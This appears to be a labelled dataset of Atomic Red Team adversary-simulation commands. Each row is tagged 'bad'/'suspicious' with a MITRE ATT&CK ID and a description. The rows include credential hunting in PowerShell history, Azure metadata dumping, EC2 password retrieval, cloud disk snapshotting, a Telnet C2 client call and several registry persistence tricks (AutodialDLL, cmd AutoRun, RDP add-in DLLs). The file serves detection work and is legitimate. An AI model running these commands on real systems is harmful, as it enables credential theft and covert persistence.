IO.FileStream ""\\.\#{volume}"", 'Open', 'Read', 'ReadWrite' $handle.Read($buffer, 0, $buffer.Length) $handle.Close() Format-Hex -InputObject $buffer",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1006/T1006.yaml,Read volume boot sector via DOS device path (PowerShell),T1006,"[""T1006""]",windows,0.9,False,"This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))): `",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eaf66e312fcab81014242974,#{client_path} #{server_ip} --port #{server_port},#{client_path} #{server_ip} --port #{server_port},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1071/T1071.yaml,Telnet C2,T1071,"[""T1071""]",windows,0.9,False,"An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a74a88996e765f9e41cf3f44,tasklist.exe /svc sc query sc query state= all,tasklist.exe /svc sc query sc query state= all,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery,T1007,"[""T1007""]",windows,0.9,False,"Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2542c48b7a552af73687f2f9,net.exe start >> #{output_file},net.exe start >> #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - net.exe,T1007,"[""T1007""]",windows,0.9,False,"Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9ccd0da521f4bcfbbf870196,del /f /q /s #{output_file} >nul 2>&1,del /f /q /s #{output_file} >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - net.exe,T1007,"[""T1007""]",windows,0.55,True,"Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3eccdb9d69f50d20ea034111,"if [ ""$(uname)"" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;","if [ ""$(uname)"" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - systemctl/service,T1007,"[""T1007""]",linux,0.9,False,"Enumerates system service using systemctl/service ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 841b0960a2cb4b16bc82f807,powershell.exe Get-Service,powershell.exe Get-Service,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,Get-Service Execution,T1007,"[""T1007""]",windows,0.9,False,Executes the Get-Service cmdlet to gather objects representing all services on the local system.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bc533405f566b96a99061fde,launchctl list,launchctl list,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - macOS launchctl,T1007,"[""T1007""]",macos,0.9,False,"Enumerates services on macOS using launchctl. Used by adversaries for identifying daemons, background services, and persistence mechanisms. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f7aa2216be20ce8cf6385a5f,schtasks /query /fo LIST /v,schtasks /query /fo LIST /v,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - Windows Scheduled Tasks (schtasks),T1007,"[""T1007""]",windows,0.9,False,"Enumerates scheduled tasks on Windows using schtasks.exe. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 335eb395b1930779a1266e65,Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object { $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue [PSCustomObject]@{ Name = $_.PSChildName DisplayName = $p.DisplayName ImagePath = $p.ImagePath StartType = $p.Start } },Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object { $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue [PSCustomObject]@{ Name = $_.PSChildName DisplayName = $p.DisplayName ImagePath = $p.ImagePath StartType = $p.Start } },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - Services Registry Enumeration,T1007,"[""T1007""]",windows,0.9,False,"Enumerates Windows services by reading the Services registry key (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control Manager APIs or CLI tools such as sc.exe or Get-Service. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33a63ad0d0a2a33e4a1d3b92,"echo ""[*] Listing SysV init scripts (/etc/init.d):"" if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo ""/etc/init.d not present on this system""; fi echo echo ""[*] Listing runlevel directories (/etc/rc*.d):"" ls -ld /etc/rc*.d 2>/dev/null || echo ""No /etc/rc*.d directories found""","echo ""[*] Listing SysV init scripts (/etc/init.d):"" if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo ""/etc/init.d not present on this system""; fi echo echo ""[*] Listing runlevel directories (/etc/rc*.d):"" ls -ld /etc/rc*.d 2>/dev/null || echo ""No /etc/rc*.d directories found""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1007/T1007.yaml,System Service Discovery - Linux init scripts,T1007,"[""T1007""]",linux,0.9,False,"Enumerates system services by listing SysV init scripts and runlevel symlinks under /etc/init.d and /etc/rc*.d. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e7afd001ce430844b9583ed1,remove-item $env:temp\T1552.005Test1.txt -force -erroraction silentlycontinue,remove-item $env:temp\T1552.005Test1.txt -force -erroraction silentlycontinue,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.005/T1552.005.yaml,Azure - Search Azure AD User Attributes for Passwords,T1552.005,"[""T1552.005""]",azure-ad,0.55,True,"This test uses the MSOnline Powershell module to retrieve all user attributes for a specified account, which can sometimes contain unsecured credentials. Upon successful execution, this test will scan all user attributes for any strings containing ""password"". Those unsecured credentials will be output to a text file, as well as the account that they are associated with and the user attribute in which they were found. See: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatshe",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3c50559ea62504decbb819a0,"Invoke-RestMethod -Headers @{""Metadata""=""true""} -Method GET -Uri ""http://169.254.169.254/metadata/instance?api-version=2021-02-01"" | ConvertTo-Json -Depth 64 > #{output_file}","Invoke-RestMethod -Headers @{""Metadata""=""true""} -Method GET -Uri ""http://169.254.169.254/metadata/instance?api-version=2021-02-01"" | ConvertTo-Json -Depth 64 > #{output_file}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.005/T1552.005.yaml,Azure - Dump Azure Instance Metadata from Virtual Machines,T1552.005,"[""T1552.005""]",iaas:azure,0.9,False,"This test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file. See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fd0fe4ddf2262f664156c9e9,remove-item #{output_file} -force -erroraction silentlycontinue,remove-item #{output_file} -force -erroraction silentlycontinue,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552.005/T1552.005.yaml,Azure - Dump Azure Instance Metadata from Virtual Machines,T1552.005,"[""T1552.005""]",iaas:azure,0.55,True,"This test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file. See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 83ee57ae4f207fd3c41000e1,"export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.credential-access.ec2-get-password-data echo ""starting detonate"" ./stratus detonate aws.credential-access.ec2-get-password-data --force","export AWS_REGION=#{aws_region} cd #{stratus_path} echo ""starting warmup"" ./stratus warmup aws.credential-access.ec2-get-password-data echo ""starting detonate"" ./stratus detonate aws.credential-access.ec2-get-password-data --force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552/T1552.yaml,AWS - Retrieve EC2 Password Data using stratus,T1552,"[""T1552""]","linux,macos,iaas:aws",0.9,False,This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.clo,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ff1ee2e9e4b217c1bb0f5743,"export AWS_REGION=#{aws_region} echo ""Cleanup detonation"" cd #{stratus_path} ./stratus cleanup --all rm -rf stratus*","export AWS_REGION=#{aws_region} echo ""Cleanup detonation"" cd #{stratus_path} ./stratus cleanup --all rm -rf stratus*",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552/T1552.yaml,AWS - Retrieve EC2 Password Data using stratus,T1552,"[""T1552""]","linux,macos,iaas:aws",0.55,True,This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.clo,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e642c56ecfd37efd3c6181a9,"ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Select-String ""password"", ""-p"", ""key"", ""pwd"", ""pass""","ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Select-String ""password"", ""-p"", ""key"", ""pwd"", ""pass""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1552/T1552.yaml,Search for Passwords in Powershell History,T1552,"[""T1552""]",windows,0.9,False,"Find passwords in the powershell history files Searching for following strings: ""password"", ""-p"", ""key"", ""pwd"", ""pass"" ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b35712af76844ee6a4e41b9b,docker build -t t1612 $PathtoAtomicsFolder/T1612/src/ docker run --name t1612_container --rm -d -t t1612 docker exec t1612_container ./test.sh,docker build -t t1612 $PathtoAtomicsFolder/T1612/src/ docker run --name t1612_container --rm -d -t t1612 docker exec t1612_container ./test.sh,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1612/T1612.yaml,Build Image On Host,T1612,"[""T1612""]",containers,0.9,False,"Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ebe76fd08f99f9d8e79c6d7,docker stop t1612_container docker rmi -f t1612,docker stop t1612_container docker rmi -f t1612,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1612/T1612.yaml,Build Image On Host,T1612,"[""T1612""]",containers,0.55,True,"Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2df593d82d7f7fd4ddbc344c,"aws ec2 create-snapshot --region #{aws_region} --volume-id #{aws_volume_id} --description ""Atomic Red Team Test Snapshot"" --query ""SnapshotId"" --output text","aws ec2 create-snapshot --region #{aws_region} --volume-id #{aws_volume_id} --description ""Atomic Red Team Test Snapshot"" --query ""SnapshotId"" --output text",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,AWS - Create Snapshot from EBS Volume,T1578.001,"[""T1578.001""]",iaas:aws,0.9,False,"Creates an EBS snapshot in AWS using the AWS CLI. This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2ecd471887b3555c25f041f1,"SNAPSHOT_ID=$(aws ec2 describe-snapshots --region #{aws_region} --filters ""Name=volume-id,Values=#{aws_volume_id}"" --query ""Snapshots[0].SnapshotId"" --output text) if [ ""$SNAPSHOT_ID"" != ""None"" ]; then aws ec2 delete-snapshot --region #{aws_region} --snapshot-id ""$SNAPSHOT_ID"" fi","SNAPSHOT_ID=$(aws ec2 describe-snapshots --region #{aws_region} --filters ""Name=volume-id,Values=#{aws_volume_id}"" --query ""Snapshots[0].SnapshotId"" --output text) if [ ""$SNAPSHOT_ID"" != ""None"" ]; then aws ec2 delete-snapshot --region #{aws_region} --snapshot-id ""$SNAPSHOT_ID"" fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,AWS - Create Snapshot from EBS Volume,T1578.001,"[""T1578.001""]",iaas:aws,0.55,True,"Creates an EBS snapshot in AWS using the AWS CLI. This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2059d0edebba493e961fc014,az snapshot create --resource-group #{azure_resource_group} --name #{azure_snapshot_name} --source #{azure_disk_name} --location eastus,az snapshot create --resource-group #{azure_resource_group} --name #{azure_snapshot_name} --source #{azure_disk_name} --location eastus,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,Azure - Create Snapshot from Managed Disk,T1578.001,"[""T1578.001""]",iaas:azure,0.9,False,"Creates a snapshot of a managed disk in Azure using the Azure CLI. Simulates adversary snapshotting behavior for persistence or data duplication. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4c6a677fa489b7635d8f4d2e,az snapshot delete --resource-group #{azure_resource_group} --name #{azure_snapshot_name},az snapshot delete --resource-group #{azure_resource_group} --name #{azure_snapshot_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,Azure - Create Snapshot from Managed Disk,T1578.001,"[""T1578.001""]",iaas:azure,0.55,True,"Creates a snapshot of a managed disk in Azure using the Azure CLI. Simulates adversary snapshotting behavior for persistence or data duplication. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2ee73a7a6c313ee21595193c,gcloud compute snapshots create #{gcp_snapshot_name} --source-disk=#{gcp_disk_name} --zone=#{gcp_zone},gcloud compute snapshots create #{gcp_snapshot_name} --source-disk=#{gcp_disk_name} --zone=#{gcp_zone},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,GCP - Create Snapshot from Persistent Disk,T1578.001,"[""T1578.001""]",iaas:gcp,0.9,False,"Creates a snapshot of a persistent disk in GCP using the gcloud CLI. Emulates adversary behavior to gain access to volume data or replicate environment state. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fef8c64cd2596a03738aba7c,gcloud compute snapshots delete #{gcp_snapshot_name} --quiet,gcloud compute snapshots delete #{gcp_snapshot_name} --quiet,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1578.001/T1578.001.yaml,GCP - Create Snapshot from Persistent Disk,T1578.001,"[""T1578.001""]",iaas:gcp,0.55,True,"Creates a snapshot of a persistent disk in GCP using the gcloud CLI. Emulates adversary behavior to gain access to volume data or replicate environment state. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6e1af7c19374993cb04a4ac0,"Start-Process -FilePath ""#{autoit_path}"" -ArgumentList ""#{script_path}""","Start-Process -FilePath ""#{autoit_path}"" -ArgumentList ""#{script_path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1059/T1059.yaml,AutoIt Script Execution,T1059,"[""T1059""]",windows,0.9,False,"An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fdcf01b25d3ffb64755f11af,Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll,Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence with Custom AutodialDLL,T1546,"[""T1546""]",windows,0.9,False,"The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cea53eb33d6fc35059872ea4,Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll,Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence with Custom AutodialDLL,T1546,"[""T1546""]",windows,0.55,True,"The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 88dea282a9d27dc2ed14aaa6,"New-ItemProperty -Path ""HKLM:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -Value ""#{command}"" -PropertyType ""String""","New-ItemProperty -Path ""HKLM:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -Value ""#{command}"" -PropertyType ""String""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),T1546,"[""T1546""]",windows,0.9,False,"An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f25a7acb81eefdd7e100dd3a,"Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -ErrorAction Ignore","Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),T1546,"[""T1546""]",windows,0.55,True,"An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f3fbf9517cb797e4e68a7cf7,"$path = ""HKCU:\Software\Microsoft\Command Processor"" if (!(Test-Path -path $path)){ New-Item -ItemType Key -Path $path } New-ItemProperty -Path $path -Name ""AutoRun"" -Value ""#{command}"" -PropertyType ""String""","$path = ""HKCU:\Software\Microsoft\Command Processor"" if (!(Test-Path -path $path)){ New-Item -ItemType Key -Path $path } New-ItemProperty -Path $path -Name ""AutoRun"" -Value ""#{command}"" -PropertyType ""String""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),T1546,"[""T1546""]",windows,0.9,False,"An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b10527704ea87e080936afd4,"Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -ErrorAction Ignore","Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Command Processor"" -Name ""AutoRun"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),T1546,"[""T1546""]",windows,0.55,True,"An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 44f2d421b2778b125494db31,"reg add ""HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs"" /v Debugger /t REG_SZ /d ""C:\Windows\System32\notepad.exe"" /f","reg add ""HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs"" /v Debugger /t REG_SZ /d ""C:\Windows\System32\notepad.exe"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Adding custom debugger for Windows Error Reporting,T1546,"[""T1546""]",windows,0.9,False,"When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry. Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9298f453979701c5608947db,"reg delete ""HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs"" /v Debugger /f","reg delete ""HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs"" /v Debugger /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Adding custom debugger for Windows Error Reporting,T1546,"[""T1546""]",windows,0.55,True,"When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry. Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cd056947561848a22ae81135,"reg add ""HKLM\SOFTWARE\Microsoft\Terminal Server Client"" /v ClxDllPath /t REG_SZ /d ""#{dll_inf}"" /f","reg add ""HKLM\SOFTWARE\Microsoft\Terminal Server Client"" /v ClxDllPath /t REG_SZ /d ""#{dll_inf}"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Load custom DLL on mstsc execution,T1546,"[""T1546""]",windows,0.9,False,"Adding ClxDllPath under Terminal Server Client subkey of HKLM hive with a path to custom DLL allows for DLL loading during execution of mstsc.exe ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0604f1318945021c08d7ea86,"reg delete ""HKLM\SOFTWARE\Microsoft\Terminal Server Client"" /v ClxDllPath /f","reg delete ""HKLM\SOFTWARE\Microsoft\Terminal Server Client"" /v ClxDllPath /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Load custom DLL on mstsc execution,T1546,"[""T1546""]",windows,0.55,True,"Adding ClxDllPath under Terminal Server Client subkey of HKLM hive with a path to custom DLL allows for DLL loading during execution of mstsc.exe ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2349d5b3f023cde5b42a919,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin"" /v Path /t REG_SZ /d ""C:\Windows\System32\amsi.dll"" /f","reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin"" /v Path /t REG_SZ /d ""C:\Windows\System32\amsi.dll"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence using automatic execution of custom DLL during RDP session,T1546,"[""T1546""]",windows,0.9,False,"When remote desktop session is accepted, the system queries the key it queries the Registry key:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin. If such key exists, the OS will attempt to read the Path value underneath.Once the Path is read, the DLL that it points to will be loaded via LoadLibrary.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f128b7407924e1be1fcdbee2,"reg delete ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin"" /f","reg delete ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence using automatic execution of custom DLL during RDP session,T1546,"[""T1546""]",windows,0.55,True,"When remote desktop session is accepted, the system queries the key it queries the Registry key:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin. If such key exists, the OS will attempt to read the Path value underneath.Once the Path is read, the DLL that it points to will be loaded via LoadLibrary.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2c632ffdd36c0bdcd2b03e4,Copy-Item -Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd C:\windows\System32\oobe\Setup,Copy-Item -Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd C:\windows\System32\oobe\Setup,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence via ErrorHandler.cmd script execution,T1546,"[""T1546""]",windows,0.9,False,"Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory. Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ba23e3ef9231dff71a883a87,Remove-Item C:\Windows\Setup\Scripts\ErrorHandler.cmd,Remove-Item C:\Windows\Setup\Scripts\ErrorHandler.cmd,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence via ErrorHandler.cmd script execution,T1546,"[""T1546""]",windows,0.55,True,"Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory. Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 944503e15492df35e007846d,"reg add ""HKCU\Software\Microsoft\Office\16.0\Word\Options"" /v STARTUP-PATH /t REG_SZ /d ""C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"" /f","reg add ""HKCU\Software\Microsoft\Office\16.0\Word\Options"" /v STARTUP-PATH /t REG_SZ /d ""C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence using STARTUP-PATH in MS-WORD,T1546,"[""T1546""]",windows,0.9,False,"When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists, it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx The registry key can be abused to load malware from the mentioned path. Reboot might be 